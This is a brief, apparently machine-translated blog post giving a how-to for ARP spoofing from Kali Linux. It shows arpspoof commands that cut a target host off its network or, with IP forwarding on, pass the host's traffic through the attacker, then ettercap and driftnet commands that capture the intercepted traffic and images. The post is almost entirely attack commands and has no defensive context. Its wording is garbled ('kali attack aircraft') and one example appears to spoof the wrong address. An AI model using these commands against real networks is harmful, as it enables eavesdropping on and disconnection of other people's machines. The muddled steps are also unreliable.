kali Linux ARP spoofing

apr divided off network with forwarding

In / proc / sys / net / ipv4 / ip_forward file

If set to 0 for off net (the default setting), if it is 1 for forward

 

1, off net

Set / proc / sys / net / ipv4 / ip_forward value 0

arpspoof -i eth0 -t 192.168.20.10 192.168.20.1

-i interface specifies the network card eth0, -t target goal (192.168.20.10) 192.168.20.1 (gateway)

2, traffic forwarding

Set / proc / sys / net / ipv4 / ip_forward is 1

arpspoof -i eth0 -t 192.168.20.6 192.168.20.99

 

192.168.20.6 as the destination host, 192.168.20.99 as kali attack aircraft

2.1, then capture the traffic situation ettercap

ettercap -Tq -i eth0 # T represents the text display text q represents quiet

2.2, you can also capture images using driftnet

driftnet -i  eth0

 

Guess you like

Origin www.cnblogs.com/zzg521/p/11812628.html